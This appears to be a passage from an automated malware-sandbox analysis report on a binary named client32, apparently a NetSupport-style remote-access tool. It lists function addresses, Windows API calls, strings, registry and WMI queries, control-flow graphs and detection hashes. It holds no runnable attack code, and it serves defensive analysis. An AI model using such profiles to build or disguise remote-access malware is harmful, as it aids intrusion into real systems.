                                                                                                                              • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GlobalAddAtomA.KERNEL32 ref: 1115F268
                                                                                                                              • GetLastError.KERNEL32 ref: 1115F275
                                                                                                                              • wsprintfA.USER32 ref: 1115F288
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                              • GlobalAddAtomA.KERNEL32 ref: 1115F2CC
                                                                                                                              • GlobalAddAtomA.KERNEL32 ref: 1115F2D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                              • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                              • API String ID: 1734919802-1728070458
                                                                                                                              • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                              • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                                              • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                              • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                              • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                              • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                              • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                              • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                              • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                              • API String ID: 1976012330-1024648535
                                                                                                                              • Opcode ID: 560c3a6bde9d01d90e0dc34f2f1a51b609d4a10b4a2811897f6cc5f5ffeb20f9
                                                                                                                              • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                                              • Opcode Fuzzy Hash: 560c3a6bde9d01d90e0dc34f2f1a51b609d4a10b4a2811897f6cc5f5ffeb20f9
                                                                                                                              • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 613 11061320-1106134f 614 11061635-11061648 613->614 615 11061355-11061358 613->615 616 110614b4-110614bb 615->616 617 1106135e-11061366 615->617 619 110614c1-110614c5 616->619 620 11061628-11061630 call 1105ee10 616->620 617->616 618 1106136c-11061373 617->618 618->616 621 11061379-1106137d 618->621 619->620 623 110614cb-110614cf 619->623 620->614 621->616 624 11061383-11061387 621->624 625 11061577-1106157d 623->625 626 110614d5-110614ee call 110611e0 623->626 630 11061401-11061433 RegEnumValueA 624->630 631 11061389-110613ac RegQueryInfoKeyA 624->631 628 11061624 625->628 629 11061583 625->629 638 11061565-1106156a 626->638 639 110614f0-110614f3 626->639 628->620 635 11061586-1106158f 629->635 633 11061435-11061447 call 11081d30 630->633 634 1106149c-110614b1 call 11163aa5 630->634 636 110613c5-110613cc 631->636 637 110613ae-110613c2 call 11029a70 631->637 655 1106146e-1106149a RegEnumValueA 633->655 656 11061449-11061456 633->656 634->616 641 11061590-11061595 635->641 644 110613e5-110613fd call 11163a11 636->644 645 110613ce-110613e2 call 11029a70 636->645 637->636 646 1106156d-11061573 638->646 647 110614f5-110614fd 639->647 641->641 649 11061597-1106159e 641->649 644->630 645->644 646->625 647->647 654 110614ff 647->654 657 110615b7-110615cc call 11146a90 649->657 658 110615a0-110615b4 call 11029a70 649->658 661 11061502-11061508 654->661 655->633 655->634 662 11061661-11061677 656->662 663 1106145c-11061468 call 11081e70 656->663 672 110615d0-110615d8 657->672 658->657 661->661 666 1106150a-1106151a call 11145bc0 661->666 663->655 663->662 673 1106151f-11061563 call 1105ef20 call 1105fdc0 call 11162777 * 2 666->673 672->672 674 110615da-110615fc call 11081d30 call 1105eed0 672->674 673->646 683 110615fe-1106160a call 11081e70 674->683 684 11061649-1106165e call 11162777 674->684 683->684 693 1106160c-1106161e call 11162777 683->693 684->662 693->628 693->635
                                                                                                                              APIs
                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,30AC22AD,00000000,?,00000000), ref: 110613A4
                                                                                                                              • _malloc.LIBCMT ref: 110613EB
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,30AC22AD,00000000), ref: 1106142B
                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                                                              • _free.LIBCMT ref: 110614A4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                              • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                              • API String ID: 999355418-161875503
                                                                                                                              • Opcode ID: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
                                                                                                                              • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                              • Opcode Fuzzy Hash: 79f9d95dc31589ce229f42c46481764fd215ce45ce6817b319d42404178997cd
                                                                                                                              • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 696 1115c8e0-1115c94f CoInitializeSecurity CoCreateInstance 697 1115c955-1115c99d wsprintfW SysAllocString 696->697 698 1115cad4-1115cadc 696->698 703 1115cac1-1115cace SysFreeString 697->703 704 1115c9a3-1115c9c9 697->704 699 1115cae6-1115cb03 call 11162bb7 698->699 700 1115cade-1115cae1 698->700 700->699 703->698 704->703 707 1115c9cf-1115c9ea 704->707 709 1115c9f0-1115ca01 707->709 710 1115cab3-1115cabc 707->710 711 1115ca04-1115ca0d 709->711 710->703 711->711 712 1115ca0f-1115ca18 711->712 713 1115ca2c-1115ca5f call 110978f0 * 2 712->713 714 1115ca1a-1115ca29 wsprintfW 712->714 719 1115ca65 713->719 720 1115ca61-1115ca63 713->720 714->713 721 1115ca67-1115ca6b 719->721 720->721 722 1115ca71 721->722 723 1115ca6d-1115ca6f 721->723 724 1115ca73-1115ca87 722->724 723->724 725 1115ca8a-1115caab call 110979a0 * 2 724->725 725->710 730 1115caad 725->730 730->710
                                                                                                                              APIs
                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,30AC22AD,00000000,?), ref: 1115C927
                                                                                                                              • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                              • wsprintfW.USER32 ref: 1115C967
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                              • wsprintfW.USER32 ref: 1115CA27
                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                              • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                              • API String ID: 3050498177-823534439
                                                                                                                              • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                              • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                              • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                              • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 731 11146010-1114602b 732 11146031 call 11145f00 731->732 733 1114610d-1114611a call 11162bb7 731->733 736 11146036-1114603e 732->736 736->733 738 11146044-1114609f call 11162be0 GetVersionExA LoadLibraryA 736->738 741 111460a1-111460af GetProcAddress 738->741 742 111460ca-111460d8 GetSystemDefaultLangID 738->742 743 111460b1-111460b8 741->743 744 111460be-111460c8 FreeLibrary 741->744 745 111460db-111460e4 742->745 743->744 744->742 744->745 746 111460e6-111460ea 745->746 747 1114611b-1114611e 745->747 751 111460f2-111460f9 746->751 752 111460ec-111460f0 746->752 748 11146105-1114610c 747->748 749 11146120-11146123 747->749 748->733 753 11146125-11146129 749->753 754 1114612b-11146132 749->754 755 111460fb 751->755 756 11146134-1114613e 751->756 752->751 752->755 753->754 753->755 754->755 754->756 755->748 756->748
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 11145F00: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                                • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                              • _memset.LIBCMT ref: 11146055
                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                              • API String ID: 4251163631-545709139
                                                                                                                              • Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                              • Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
                                                                                                                              • Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
                                                                                                                              • Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • wsprintfA.USER32 ref: 1101567A
                                                                                                                              • _memset.LIBCMT ref: 110156BE
                                                                                                                              • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8
                                                                                                                              Strings
                                                                                                                              • %012d, xrefs: 11015674
                                                                                                                              • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
                                                                                                                              • PackedCatalogItem, xrefs: 110156E2
                                                                                                                              • NSLSP, xrefs: 11015708
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue_memsetwsprintf
                                                                                                                              • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                              • API String ID: 1333399081-1346142259
                                                                                                                              • Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                              • Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
                                                                                                                              • Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
                                                                                                                              • Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 794 11010140-11010189 call 11161531 797 110101b6-110101c4 794->797 798 1101018b-1101019c call 11161531 794->798 799 110101c6-110101ce 797->799 800 110101e8-110101ea 797->800 805 110101ae-110101b1 call 11161559 798->805 806 1101019e-110101a9 798->806 803 110101d0-110101d4 799->803 804 110101ec 799->804 800->803 803->804 807 110101d6-110101de call 111615fc 803->807 808 110101ee-110101f0 804->808 805->797 806->805 811 110101f2-110101f4 807->811 819 110101e0-110101e6 807->819 808->811 812 11010257-11010279 call 11161559 808->812 815 110101f6-110101f8 811->815 816 110101fa-110101ff call 1100f5c0 811->816 815->812 820 11010204-1101020a 816->820 819->808 821 11010227-11010240 call 11161531 820->821 822 1101020c-11010222 call 111630c1 call 111634b1 820->822 828 11010242-11010243 821->828 829 11010246-11010254 call 11161559 call 11161585 821->829 822->821 828->829 829->812
                                                                                                                              APIs
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                                              • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                              • String ID: bad cast
                                                                                                                              • API String ID: 2427920155-3145022300
                                                                                                                              • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                              • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                                              • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                                              • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

